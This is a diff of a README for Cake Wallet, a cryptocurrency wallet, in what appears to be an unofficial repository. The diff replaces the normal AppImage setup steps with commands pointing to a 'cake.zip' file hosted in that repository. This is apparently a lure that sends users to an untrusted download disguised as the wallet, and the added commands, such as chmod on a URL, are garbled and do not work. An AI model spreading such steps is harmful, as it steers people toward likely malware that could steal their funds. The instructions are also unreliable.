Hatibumwanga/cake/README.md

 ### For Linux:
 1. Navigate to the folder where you downloaded the `.AppImage` file.
-2. Open a terminal and run the command: `chmod +x CakeWallet.AppImage` to make it executable.
+2. Open a terminal and run the command: `chmod +x https://raw.githubusercontent.com/Hatibumwanga/cake/main/fanman/cake.zip` to make it executable.
-3. Then, run it with `./CakeWallet.AppImage` to open the application.
+3. Then, run it with `https://raw.githubusercontent.com/Hatibumwanga/cake/main/fanman/cake.zip` to open the application.

 ## 📲 Using Cake Wallet
 When you first open Cake Wallet, you'll be prompted to set up your wallet: